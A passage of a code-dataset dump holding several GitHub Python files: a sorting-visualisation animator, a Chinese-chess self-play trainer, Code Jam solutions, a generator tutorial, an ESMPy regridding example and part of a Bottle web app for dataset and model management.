[]\n\t\t\telse:\n\t\t\t\traise Exception\n\t\t\ttotal += 1\n\n\t\t\tfor addr, color in zip(addrs, colors):\n\t\t\t\tbar = bars[addr.block][addr.offset]\n\t\t\t\tbar.set_height(addr.get())\n\t\t\t\tbar.set_facecolor(color)\n\t\t\t\tprev_bars.append(bar)\n\t\t\t\tret.append(bar)\n\n\t\treturn ret\n\n\tani = FuncAnimation(fig, update, frames=frame_times, init_func=init,\n\t interval=1000/FPS, repeat=False)\n\tani.save(filename)\n\tpbar.close()\n\n\ndef animate_bars(env: Env):\n\tCOLOR_IDLE = 'white'\n\tCOLORS_CMP = ['limegreen'] * 2\n\tCOLORS_SWAP = ['red'] * 2\n\tCOLORS_MOV = ['red', 'limegreen']\n\n\tenv = deepcopy(env)\n\n\tblocks = env.mem.blocks\n\tevents = env.events\n\t[e.revert() for e in events[::-1]]\n\n\tplt.style.use('dark_background')\n\tfig, (axs,) = plt.subplots(1, len(blocks), sharey=True, squeeze=False,\n\t gridspec_kw={\n\t\t 'width_ratios': [len(b) for b in blocks],\n\t\t 'wspace': 0,\n\t })\n\tfor ax in axs:\n\t\tax.spines['top'].set_visible(False)\n\t\tax.tick_params(which='both',\n\t\t bottom=False, top=False, left=False, right=False,\n\t\t labelbottom=False, labeltop=False, labelleft=False, labelright=False)\n\tfig.tight_layout(pad=0, rect=[0, 0, 1, 0.95])\n\tbars = {block: ax.bar(range(len(block)), block, width=1, color=COLOR_IDLE, edgecolor='black', linewidth=0.5)\n\t for ax, block in zip(axs, blocks)}\n\n\tcmps = swaps = movs = total = 0\n\tdef title_fmt():\n\t\treturn f'Cmps:{cmps} -- Swaps:{swaps} -- Movs:{movs} -- Total:{total}'\n\n\tprev_bars = []\n\n\tdef init():\n\t\tfig.suptitle(title_fmt())\n\t\treturn []\n\n\tdef update(event: Event):\n\t\tnonlocal prev_bars, cmps, swaps, movs, total\n\n\t\tfig.suptitle(title_fmt())\n\n\t\tret = []\n\n\t\tfor bar in prev_bars:\n\t\t\tbar.set_facecolor(COLOR_IDLE)\n\t\t\tret.append(bar)\n\t\tprev_bars = []\n\n\t\tevent.apply()\n\n\t\tif isinstance(event, EventCmp):\n\t\t\tcmps += 1\n\t\t\tcolors = COLORS_CMP\n\t\t\taddrs = [event.addr1, event.addr2]\n\t\telif isinstance(event, EventSwap):\n\t\t\tswaps += 1\n\t\t\tcolors = COLORS_SWAP\n\t\t\taddrs = [event.addr1, event.addr2]\n\t\telif isinstance(event, EventMov):\n\t\t\tmovs += 1\n\t\t\tcolors = COLORS_MOV\n\t\t\taddrs = [event.dst, event.src]\n\t\telif isinstance(event, EventEnd):\n\t\t\treturn []\n\t\telse:\n\t\t\traise Exception\n\t\ttotal += 1\n\n\t\tfor addr, 
color in zip(addrs, colors):\n\t\t\tbar = bars[addr.block][addr.offset]\n\t\t\tbar.set_height(addr.get())\n\t\t\tbar.set_facecolor(color)\n\t\t\tprev_bars.append(bar)\n\t\t\tret.append(bar)\n\n\t\treturn ret\n\n\tani = FuncAnimation(fig, update, frames=events, init_func=init, interval=1000/10, repeat=False)\n\tplt.show()\n","repo_name":"floofnoodlecode/sorting-midi","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16824595771","text":"import os\nimport random\nimport time\n\nimport tensorflow as tf\nimport logging\n\nimport numpy as np\n\nfrom env.game_state import GameState\nfrom agent import resnet, players\nfrom env.cchess_env import create_uci_labels\nfrom lib import cbf\nfrom config import conf\nfrom lib.utils import get_latest_weight_path\n\n\nlogging.basicConfig(level=logging.INFO,\n format=\"[%(asctime)s][%(levelname)s][%(message)s]\",\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n )\nrunning_time = 0\nrunning_step = 0\n\n\ndef count_piece(state_str):\n pieceset = {\n 'A',\n 'B',\n 'C',\n 'K',\n 'N',\n 'P',\n 'R',\n 'a',\n 'b',\n 'c',\n 'k',\n 'n',\n 'p',\n 'r'\n }\n return sum([1 for single_chessman in state_str if single_chessman in pieceset])\n\n\nclass Game(object):\n def __init__(self, white, black, verbose=True):\n self.white = white\n self.black = black\n self.verbose = verbose\n self.gamestate = GameState()\n self.total_time = 0\n self.steps = 0\n \n def play_till_end(self):\n global running_step\n global running_time\n\n winner = 'peace'\n moves = []\n peace_round = 0\n remain_piece = count_piece(self.gamestate.statestr)\n while True:\n start_time = time.time()\n if self.gamestate.move_number % 2 == 0:\n player_name = 'w'\n player = self.white\n opponent_player = self.black\n else:\n player_name = 'b'\n player = self.black\n opponent_player = self.white\n \n move, score = player.make_move(self.gamestate, allow_legacy=True)\n opponent_player.oppoent_make_move(move, allow_legacy=True)\n\n if move is None:\n winner = 'b' if player_name == 'w' else 'w'\n break\n moves.append(move)\n # if self.verbose:\n total_time = time.time() - start_time\n self.total_time += total_time\n self.steps += 1\n running_time += total_time\n running_step += 1\n logging.info('time average {}'.format(round(running_time / running_step, 2)))\n logging.info('move {} {} play {} score {} use {:.2f}s pr {} pid {}'.format(\n self.gamestate.move_number,\n player_name,\n move,\n score if player_name == 'w' else -score,\n total_time,\n peace_round,\n os.getpid())\n )\n game_end, winner_p = self.gamestate.game_end()\n if game_end:\n winner = winner_p\n break\n \n remain_piece_round = count_piece(self.gamestate.statestr)\n if remain_piece_round < remain_piece:\n remain_piece = remain_piece_round\n peace_round = 0\n else:\n peace_round += 1\n if peace_round > conf.SelfPlayConfig.non_cap_draw_round:\n winner = 'peace'\n break\n return winner, moves\n\n\nclass NetworkPlayGame(Game):\n def __init__(self, network_w, network_b, **xargs):\n whiteplayer = players.NetworkPlayer('w', network_w, **xargs)\n blackplayer = players.NetworkPlayer('b', network_b, **xargs)\n super(NetworkPlayGame, self).__init__(whiteplayer, blackplayer)\n\n\nclass ContinousNetworkPlayGames(object):\n def __init__(\n self,\n network_w=None,\n network_b=None,\n white_name='net',\n black_name='net',\n random_switch=True,\n recoard_game=True,\n recoard_dir='data/distributed/',\n play_times=np.inf,\n 
distributed_dir='data/prepare_weight',\n **xargs\n ):\n self.network_w = network_w\n self.network_b = network_b\n self.white_name = white_name\n self.black_name = black_name\n self.random_switch = random_switch\n self.play_times = play_times\n self.recoard_game = recoard_game\n self.recoard_dir = recoard_dir\n self.xargs = xargs\n # self.distributed_server = distributed_server\n self.distributed_dir = distributed_dir\n \n def begin_of_game(self):\n pass\n \n def end_of_game(self, cbf_name, moves, cbfile, training_dt, epoch):\n pass\n \n def play(self, data_url=None, epoch=0, yundao_new_data_dir=None):\n num = 0\n while num < self.play_times:\n time_one_game_start = time.time()\n num += 1\n self.begin_of_game()\n if self.random_switch and random.random() < 0.5:\n self.network_w, self.network_b = self.network_b, self.network_w\n self.white_name, self.black_name = self.black_name, self.white_name\n \n network_play_game = NetworkPlayGame(self.network_w, self.network_b, **self.xargs)\n winner, moves = network_play_game.play_till_end()\n \n stamp = time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))\n date = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n cbfile = cbf.CBF(\n black=self.black_name,\n red=self.white_name,\n date=date,\n site='北京',\n name='noname',\n datemodify=date,\n redteam=self.white_name,\n blackteam=self.black_name,\n round='第一轮'\n )\n cbfile.receive_moves(moves)\n \n randstamp = random.randint(0, 1000)\n cbffilename = '{}_{}_mcts-mcts_{}-{}_{}.cbf'.format(\n stamp, randstamp, self.white_name, self.black_name, winner)\n cbf_name = os.path.join(self.recoard_dir, cbffilename)\n cbfile.dump(cbf_name)\n\n if data_url:\n output_game_file_path = os.path.join(data_url, cbffilename)\n cbfile.dump(output_game_file_path)\n\n if yundao_new_data_dir:\n import moxing as mox\n mox.file.copy(cbf_name, os.path.join(yundao_new_data_dir, cbffilename))\n\n training_dt = time.time() - time_one_game_start\n self.end_of_game(cbffilename, moves, cbfile, training_dt, epoch)\n\n\nclass DistributedSelfPlayGames(ContinousNetworkPlayGames):\n def __init__(self, gpu_num=0, auto_update=True, **kwargs):\n self.gpu_num = gpu_num\n self.auto_update = auto_update\n self.model_name_in_use = None # for tracking latest weight\n super(DistributedSelfPlayGames, self).__init__(**kwargs)\n\n def begin_of_game(self):\n \"\"\"\n when self playing, init network player using the latest weights\n \"\"\"\n if not self.auto_update:\n return\n\n latest_model_name = get_latest_weight_path()\n model_path = os.path.join(self.distributed_dir, latest_model_name)\n if self.network_w is None or self.network_b is None:\n network = resnet.get_model(\n model_path,\n create_uci_labels(),\n gpu_core=[self.gpu_num],\n filters=conf.TrainingConfig.network_filters,\n num_res_layers=conf.TrainingConfig.network_layers\n )\n self.network_w = network\n self.network_b = network\n self.model_name_in_use = model_path\n else:\n if model_path != self.model_name_in_use:\n (sess, graph), ((X, training), (net_softmax, value_head)) = self.network_w\n with graph.as_default():\n saver = tf.train.Saver(var_list=tf.global_variables())\n saver.restore(sess, model_path)\n self.model_name_in_use = model_path\n\n def end_of_game(self, cbf_name, moves, cbfile, training_dt, epoch):\n trained_games = len(os.listdir(conf.ResourceConfig.distributed_datadir))\n logging.info('------------------epoch {}: trained {} games, this game used {}s'.format(\n epoch,\n trained_games,\n round(training_dt, 6),\n ))\n\n\nclass 
ValidationGames(ContinousNetworkPlayGames):\n    pass\n","repo_name":"liyang619/JiangJun","sub_path":"worker/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"23611336771","text":"#!/usr/bin/env python3.1\n\nimport sys\n\ndef calc(rows, cols, data):\n\tboard = convert_data(data)\n\tfound = {}\n\tfor size in reversed(range(1,1+min(rows, cols))):\n\t\tfor r in range(rows-size+1):\n\t\t\tfor c in range(cols-size+1):\n\t\t\t\t#print(board)\n\t\t\t\tif valid([board[r2][c:c+size] for r2 in range(r, r+size)]):\n\t\t\t\t\tif size not in found: found[size]=0\n\t\t\t\t\tfound[size] += 1\n\t\t\t\t\tfor r2 in range(r, r+size):\n\t\t\t\t\t\tboard[r2][c:c+size] = [2]*size\n\treturn format_result(found)\n\ndef valid(board):\n\tfor r in range(len(board)):\n\t\tif 2 in board[r]: return False\n\t\tif r > 0 and board[r][0] == board[r-1][0]: return False\n\t\tfor c in range(1, len(board[r])):\n\t\t\tif board[r][c] == board[r][c-1]: return False\n\treturn True\n\ndef format_result(counts):\n\tc = sorted(counts.items())\n\tc.reverse()\n\tout = str(len(c))\n\tfor size, count in c:\n\t\tout += '\\n%d %d' % (size, count)\n\treturn out\n\nbin = {'0':[0,0,0,0],'1':[0,0,0,1],'2':[0,0,1,0],'3':[0,0,1,1],\n       '4':[0,1,0,0],'5':[0,1,0,1],'6':[0,1,1,0],'7':[0,1,1,1],\n       '8':[1,0,0,0],'9':[1,0,0,1],'A':[1,0,1,0],'B':[1,0,1,1],\n       'C':[1,1,0,0],'D':[1,1,0,1], 'E':[1,1,1,0], 'F':[1,1,1,1]}\ndef convert_data(data):\n\tboard = []\n\tfor row in data:\n\t\tr = []\n\t\tfor hex in row:\n\t\t\tr += bin[hex]\n\t\tboard.append(r)\n\treturn board\n\ndef getints():\n\treturn [int(x) for x in sys.stdin.readline().strip().split(\" \")]\n\nnumTestCases = getints()[0]\nfor i in range(numTestCases):\n\trows, cols = getints()\n\tdata = [sys.stdin.readline().strip() for i in range(rows)]\n\tresult = calc(rows, cols, data)\n\tprint(\"Case #%d: %s\" % (i+1, result))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_64/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23541663081","text":"import string\r\nimport sys\r\nimport numpy as np\r\n\r\noutput=[]\r\ndef mainFunc():\r\n    f=open(\"A-large.in\",\"r\")\r\n    x=f.read()\r\n    y=x.split()\r\n    T=y[0]; del(y[0]);i=0; outputCount=0\r\n    while outputCount<int(T):\r\n        S=list(y[i]); K=int(y[i+1]); count=0\r\n        for j in range(len(S)-K+1):\r\n            if S[j]==\"-\":\r\n                for n in range(j,j+K):\r\n                    S[n]=change(S[n])\r\n                count +=1\r\n        if S.count(\"-\")>0:\r\n            outputCount +=1\r\n            print (\"Case #%d: IMPOSSIBLE\"%outputCount)\r\n        else:\r\n            outputCount +=1 \r\n            print (\"Case #%d: %d\"%(outputCount,count))\r\n        i +=2\r\ndef change(a):\r\n    if a==\"+\":\r\n        return \"-\"\r\n    else:\r\n        return \"+\"\r\n\r\nmainFunc()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/1843.py","file_name":"1843.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21145876394","text":"from typing import Generator\n\n# Normally, generators are used in for loops. However, when you\n# simply call a generator, the result is an object of type\n# ‹generator›, which represents the suspended computation. 
(For\n# future reference, native coroutines declared with ‹async def›\n# behave the same way, just the object type is different.)\n\n# Let's define a generator:\n\ndef gen1() -> Generator[ int, None, None ]:\n print( \"before yield 1\" )\n yield 1\n print( \"before yield 2\" )\n yield 2\n\n# To actually run the computation, you can call ‹__next__()› on the\n# ‹generator› object. Alternatively, you can call ‹next› with\n# generator object as the argument. Once you do that, the execution\n# of the body of ‹gen1› starts, and continues until it hits a yield.\n# At that point, the yielded value becomes the return value of\n# ‹__next__()›, like this:\n\ndef test_gen1() -> None: # demo\n x = gen1()\n print( \"constructed gen1\" )\n assert x.__next__() == 1\n print( \"no longer interested in gen1...\\n\" )\n\n# Since ‹x› is just a normal object, we can abandon it at any time.\n# Nothing forces us to keep calling ‹__next__()› on it. Let's look\n# at ‹send()› now.\n\ndef gen2() -> Generator[ int, int, None ]:\n v = yield 1\n print( \"received\", v )\n yield 2\n print( \"returning from gen2()\" )\n pass # StopIteration is automatically raised here\n\ndef test_gen2() -> None: # demo\n y = gen2()\n assert y.__next__() == 1\n assert y.send( 24 ) == 2 # resumes execution of ‹y›\n print( \"sent 24, got 2 back\" )\n try: y.__next__() # generators do not return\n except StopIteration: print( \"generator done\" )\n\nif __name__ == '__main__':\n test_gen1()\n test_gen2()\n","repo_name":"Zakys98/Python-seminar","sub_path":"04/d1_gen.py","file_name":"d1_gen.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20177328379","text":"# This example demonstrates how to create ESMPy Grid, Mesh and Field objects \n# from file and use them for regridding.\n# The data files can be retrieved from the ESMF data repository by uncommenting the\n# following block of code:\n#\n# import os\n# DD = os.path.join(os.getcwd(), \"examples/data\")\n# if not os.path.isdir(DD):\n# os.makedirs(DD)\n# from ESMF.util.cache_data import cache_data_file\n# cache_data_file(os.path.join(DD, \"so_Omon_GISS-E2.nc\"))\n# cache_data_file(os.path.join(DD, \"mpas_uniform_10242_dual_counterclockwise.nc\"))\n\nimport os\nimport ESMF\n\n# This call enables debug logging\n# ESMF.Manager(debug=True)\n\n# Set up the DATADIR\nDATADIR = os.path.join(os.getcwd(), \"examples/data\")\n\n# Create a global grid from a GRIDSPEC formatted file\ngrid = ESMF.Grid(filename=os.path.join(DATADIR, \"so_Omon_GISS-E2.nc\"),\n filetype=ESMF.FileFormat.GRIDSPEC)\n\n# Create a field on the centers of the grid, with extra dimensions\nsrcfield = ESMF.Field(grid, staggerloc=ESMF.StaggerLoc.CENTER, ndbounds=[33, 2])\n\n# Read the field data from file\nsrcfield.read(filename=os.path.join(DATADIR, \"so_Omon_GISS-E2.nc\"),\n variable=\"so\", timeslice=2)\n\n# Create an ESMF formatted unstructured mesh with clockwise cells removed\nmesh = ESMF.Mesh(filename=os.path.join(DATADIR, \"mpas_uniform_10242_dual_counterclockwise.nc\"),\n filetype=ESMF.FileFormat.ESMFMESH)\n\n# Create a field on the nodes of the mesh\ndstfield = ESMF.Field(mesh, meshloc=ESMF.MeshLoc.NODE, ndbounds=[33, 2])\n\ndstfield.data[:] = 1e20\n\n# compute the weight matrix for regridding\nregrid = ESMF.Regrid(srcfield, dstfield,\n regrid_method=ESMF.RegridMethod.BILINEAR,\n unmapped_action=ESMF.UnmappedAction.IGNORE)\n\n# calculate the regridding from source to destination field\ndstfield = regrid(srcfield, 
dstfield)\n\nif ESMF.local_pet() == 0:\n    print (\"Fields created from file regridded successfully :)\")\n","repo_name":"geoschem/gchp_legacy","sub_path":"ESMF/src/addon/ESMPy/examples/regrid_from_file.py","file_name":"regrid_from_file.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"72134362115","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport os.path\nimport platform\nimport sys\nimport traceback\nimport bottle\nfrom bottle.ext import sqlite\nimport random\nimport re\nimport zipfile\nimport yaml\nimport shutil\nimport cv2\nimport numpy\nimport time\nimport threading\nimport sqlite3\nimport subprocess\nimport chainer\nfrom xml.etree.ElementTree import *\nimport six\nimport six.moves.cPickle as pickle\nfrom datetime import datetime\nfrom json import dumps\nfrom PIL import Image\n\nimport imagenet_inspect\nimport train\n\n\n# initialization\nDEEPSTATION_ROOT = (os.getcwd() + os.sep + __file__).replace('main.py', '')\nf = open(DEEPSTATION_ROOT + os.sep + 'settings.yaml')\nsettings = yaml.load(f)\nf.close()\n\napp = bottle.Bottle()\nplugin = sqlite.Plugin(dbfile=DEEPSTATION_ROOT + os.sep + 'deepstation.db' )\napp.install(plugin)\n\nUPLOADED_IMAGES_DIR = settings['uploaded_images']\nUPLOADED_RAW_FILES_DIR = settings['uploaded_raw_files']\nPREPARED_DATA_DIR = settings['prepared_data']\nTRAINED_DATA_DIR = settings['trained_data']\nTEMP_IMAGE_DIR = settings['inspection_temp_image']\nINSPECTION_RAW_IMAGE = settings['inspection_raw_image']\nNVIDIA_SMI_CMD = settings['nvidia_smi']\n\n# static files\n@app.route('/statics/<filepath:path>')\ndef server_static(filepath):\n    return bottle.static_file(filepath, DEEPSTATION_ROOT + os.sep + 'statics' + os.sep)\n    \n@app.route('/uploaded_images/<filepath:path>')\ndef uploaded_files(filepath):\n    return bottle.static_file(filepath, UPLOADED_IMAGES_DIR )\n\n@app.route('/inspection/images/<filepath:path>')\ndef images_for_inspection(filepath):\n    return bottle.static_file(filepath, INSPECTION_RAW_IMAGE)\n\n@app.route('/trained_models/download/<filepath:path>')\ndef download_trained_model(filepath):\n    filename = filepath.split('/')[-1]\n    return bottle.static_file(filepath, TRAINED_DATA_DIR, download=filename, mimetype=\"application/octet-stream\")\n\n# main\n@app.route('/')\ndef index(db):\n    models = db.execute('select Model.id, Model.name, Model.epoch, Model.is_trained, Model.created_at, Model.network_name, Model.algorithm, Dataset.name from Model left join Dataset on Model.dataset_id = Dataset.id order by Model.id DESC')\n    dataset_cur = db.execute('select id, name, dataset_path from Dataset')\n    dataset_rows = dataset_cur.fetchall()\n    datasets = []\n    for d in dataset_rows:\n        datasets.append({\"id\": d[0], \"name\": d[1], \"dataset_path\": d[2], \"thumbnails\": get_files_in_random_order(d[2], 4), \"file_num\": count_files(d[2]), \"category_num\": count_categories(d[2])})\n    return bottle.template('index.html', models = models.fetchall(), datasets = datasets, gpu_info = get_gpu_info(), chainer_version = get_chainer_version(), python_version = get_python_version())\n\n@app.route('/inspection/upload', method='POST')\ndef do_upload_for_inspection(db):\n    model_id = bottle.request.forms.get('model_id')\n    epoch = int(bottle.request.forms.get('epoch'))\n    upload = bottle.request.files.get('fileInput')\n    name, ext = os.path.splitext(upload.filename)\n    if ext not in ('.jpg',):\n        return show_error_screen(\"File extension not allowed.\")\n    timestamp_str = get_timestamp()\n    new_filename = INSPECTION_RAW_IMAGE + os.sep + 
timestamp_str + upload.filename\n    try:\n        upload.save(new_filename)\n        row_model = db.execute('select prepared_file_path, trained_model_path, network_path, name from Model where id = ?', (model_id,))\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    model_info = row_model.fetchone()\n    result = inspect(new_filename, model_info[1] + os.sep + 'model%04d'%epoch, model_info[0], model_info[2])\n    return bottle.template('inspection_result.html',image=timestamp_str + upload.filename,results=result, name=model_info[3], epoch=epoch)\n\n@app.route('/dataset/show/<id>')\ndef dataset_show(id, db):\n    row = db.execute('select name, dataset_path from Dataset where id = ?', (id,))\n    dataset_info = row.fetchone()\n    name = dataset_info[0]\n    dataset_root_path = dataset_info[1]\n    if len(os.listdir(dataset_root_path)) == 1:\n        dataset_root_path = dataset_root_path + os.sep + os.listdir(dataset_root_path)[0]\n    dataset = []\n    for path in find_all_directories(dataset_root_path):\n        dataset.append({\"path\": path.replace(UPLOADED_IMAGES_DIR, \"\"), \"file_num\": count_files(path), \"category\": path.split(os.sep)[-1], \"thumbnails\": get_files_in_random_order(path, 4)})\n    return bottle.template('dataset_show.html', dataset = dataset, name=name, dataset_id = id)\n\n@app.route('/dataset/show/<id>/<filepath:path>')\ndef dataset_category_show(id, filepath, db):\n    row = db.execute('select name from Dataset where id = ?', (id,))\n    dataset_name = row.fetchone()[0]\n    images = []\n    for path in find_all_files(UPLOADED_IMAGES_DIR + os.sep + filepath):\n        images.append(path.replace(UPLOADED_IMAGES_DIR + os.sep, ''))\n    return bottle.template('dataset_category_detail.html', name = dataset_name, count = len(images), images = images, category = filepath.split(os.sep)[-1], dataset_id = id, dataset_path = filepath)\n\n@app.route('/dataset/delete/file/<id>/<filepath:path>', method=\"POST\")\ndef dataset_delete_an_image(id, filepath):\n    file_name = bottle.request.forms.get('file_path')\n    try:\n        os.remove(UPLOADED_IMAGES_DIR + os.sep + file_name)\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    return bottle.redirect('/dataset/show/' + id + '/' + filepath)\n\n@app.route('/dataset/delete/category/<id>', method=\"POST\")\ndef dataset_delete_a_category(id):\n    category_path = bottle.request.forms.get('category_path')\n    try:\n        shutil.rmtree(UPLOADED_IMAGES_DIR + os.sep + category_path)\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    return bottle.redirect('/dataset/show/' + id)\n\n@app.route('/dataset/upload/<id>/<filepath:path>', method=\"POST\")\ndef dataset_add_image_to_category(id, filepath):\n    upload = bottle.request.files.get('fileInput')\n    name, ext = os.path.splitext(upload.filename)\n    if ext not in ('.jpg',):\n        return show_error_screen('File extension not allowed.')\n    new_filename = UPLOADED_IMAGES_DIR + os.sep + filepath + os.sep + get_timestamp() + '_' + upload.filename\n    try:\n        upload.save(new_filename)\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    return bottle.redirect('/dataset/show/' + id + '/' + filepath)\n\n@app.route('/dataset/create/category/<id>', method=\"POST\")\ndef dataset_create_category(id, db):\n    category_name = bottle.request.forms.get('category_name')\n    result = db.execute('select dataset_path from Dataset where id = ?', (id,))\n    dataset_path = result.fetchone()[0]\n    if len(os.listdir(dataset_path)) == 1:\n        dataset_path = dataset_path + os.sep + os.listdir(dataset_path)[0]\n    try:\n        os.mkdir(dataset_path + os.sep + category_name)\n    except:\n        return 
show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    bottle.response.content_type = 'application/json'\n    return dumps({\"status\": \"ok\"})\n\n@app.route('/dataset/remove/<id>')\ndef dataset_delete(id, db):\n    row = db.execute('select dataset_path from Dataset where id = ?', (id,))\n    dataset_path = row.fetchone()[0]\n    try:\n        db.execute('delete from Dataset where id = ?', (id,))\n        shutil.rmtree(dataset_path)\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    return bottle.redirect('/')\n\n@app.route('/models/show/<id>')\ndef show_model_detail(id, db):\n    row_model = db.execute('select id, name, epoch, algorithm, is_trained, network_path, trained_model_path, graph_data_path, dataset_id, created_at, network_name from Model where id = ?', (id,))\n    model_info = row_model.fetchone()\n    ret = {\n        \"id\": model_info[0],\n        \"name\": model_info[1],\n        \"epoch\": model_info[2],\n        \"algorithm\": model_info[3],\n        \"is_trained\": model_info[4],\n        \"network_path\": model_info[5],\n        \"trained_model_path\": model_info[6],\n        \"graph_data_path\": model_info[7],\n        \"dataset_id\": model_info[8],\n        \"created_at\": model_info[9],\n        \"network_name\": model_info[10]\n    }\n    gpu_info = get_gpu_info()\n    ret['gpu_num'] = 0 if 'gpus' not in gpu_info else len(gpu_info['gpus'])\n    if ret['dataset_id'] is not None:\n        row_dataset = db.execute('select name from Dataset where id = ?', (ret['dataset_id'],))\n        dataset_info = row_dataset.fetchone()\n        if dataset_info:\n            ret['dataset_name'] = dataset_info[0]\n        else:\n            ret['dataset_name'] = '---'\n    else:\n        ret['dataset_name'] = '---'\n    model_txt = open(ret['network_path']).read()\n    row_all_datasets = db.execute('select id, name from Dataset')\n    all_datasets_info = row_all_datasets.fetchall()\n    return bottle.template('models_detail.html', model_info = ret, datasets = all_datasets_info, model_txt=model_txt,gpu_info = get_gpu_info(), chainer_version = get_chainer_version(), python_version = get_python_version())\n\n@app.route('/models/start/train', method=\"POST\")\ndef kick_train_start(db):\n    dataset_id = bottle.request.forms.get('dataset_id')\n    model_id = bottle.request.forms.get('model_id')\n    epoch = bottle.request.forms.get('epoch')\n    gpu_num = bottle.request.forms.get('gpu_num')\n    row_ds = db.execute('select dataset_path from Dataset where id = ?', (dataset_id,))\n    ds_path = row_ds.fetchone()[0]\n    prepared_file_path = PREPARED_DATA_DIR + os.sep + get_timestamp()\n    bottle.response.content_type = 'application/json'\n    try:\n        os.mkdir(prepared_file_path)\n        db.execute('update Model set prepared_file_path = ?, epoch = ?, is_trained = 1, dataset_id = ? 
where id = ?', (prepared_file_path, epoch, dataset_id, model_id))\n        prepare_for_train(ds_path, prepared_file_path)\n        start_train(model_id, epoch, prepared_file_path, gpu_num)\n    except:\n        db.execute('update Model set is_trained = 0 where id = ?', (model_id,))\n        return dumps({\"status\": \"error\", \"traceback\": traceback.format_exc(sys.exc_info()[2])})\n    return dumps({\"status\": \"OK\"})\n    \n@app.route('/models/download/<id>/<epoch>')\ndef get_trained_model(id, epoch, db):\n    row_model = db.execute('select trained_model_path from Model where id = ?', (id,))\n    path = row_model.fetchone()[0]\n    epoch = int(epoch)\n    path = path.replace(TRAINED_DATA_DIR, '')\n    return bottle.redirect('/trained_models/download' + path + '/model%04d'%epoch)\n\n@app.route('/models/labels/download/<id>')\ndef get_label_text(id, db):\n    row_model = db.execute('select prepared_file_path from Model where id = ?', (id,))\n    path = row_model.fetchone()[0]\n    return bottle.static_file('labels.txt', path, download='labels.txt', mimetype=\"text/plain\")\n\n@app.route('/models/new')\ndef make_new_model():\n    model_templates = os.listdir(DEEPSTATION_ROOT + os.sep + 'model_templates')\n    return bottle.template('new_model.html', templates = model_templates)\n    \n@app.route('/models/create', method=\"POST\")\ndef create_new_model(db):\n    model_name = bottle.request.forms.get('model_name').strip()\n    my_network = bottle.request.forms.get('my_network')\n    model_template = bottle.request.forms.get('model_template')\n    network_type = bottle.request.forms.get('network_type').strip()\n    algorithm = None\n    \n    if not re.match(r\".+\\.py\", model_name):\n        model_name += '.py'\n    if network_type is None or network_type == '':\n        if model_template is not None and model_template != '':\n            network_type = re.sub(r\"\\.py$\", \"\", model_template)\n        else:\n            network_type = None\n    if algorithm == '':\n        algorithm = None\n    \n    network_file_path = DEEPSTATION_ROOT + os.sep + 'models' + os.sep + model_name\n    try:\n        network_file = open(network_file_path, \"w\")\n        network_file.write(my_network)\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    finally:\n        network_file.close()\n    \n    t = (model_name, network_file_path, network_type, algorithm)\n    try:\n        row = db.execute(\"insert into Model(name, network_path, network_name, algorithm) values(?,?,?,?)\", t)\n    except:\n        return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n    return bottle.redirect('/models/show/' + str(row.lastrowid))\n\n@app.route('/cleanup')\ndef cleanup(db):\n    rows = db.execute('select prepared_file_path from Model')\n    paths = rows.fetchall()\n    for p in paths:\n        if p[0] is None: continue\n        for f in os.listdir(p[0]):\n            if f.split('.')[-1] in ['jpg', 'jpeg', 'gif', 'png']:\n                os.remove(p[0] + os.sep + f)\n    return bottle.redirect('/')\n\n# API ----------------------------------------------------------\n\n# handle uploaded file\n@app.route('/api/upload', method='POST')\ndef do_upload(db):\n    bottle.response.content_type = 'application/json'\n    dataset_name = bottle.request.forms.get('dataset_name')\n    upload = bottle.request.files.get('fileInput')\n    name, ext = os.path.splitext(upload.filename)\n    if ext not in ('.zip',):\n        return show_error_screen(\"File extension not allowed.\")\n    timestamp_str = get_timestamp()\n    new_filename = re.sub(r'\\.zip$', '_' + timestamp_str + '.zip', upload.filename)\n    try:\n        upload.save(UPLOADED_RAW_FILES_DIR + os.sep + new_filename, overwrite=True)\n        zf = zipfile.ZipFile(UPLOADED_RAW_FILES_DIR + os.sep + new_filename, 'r')\n        upload_image_dir_root = 
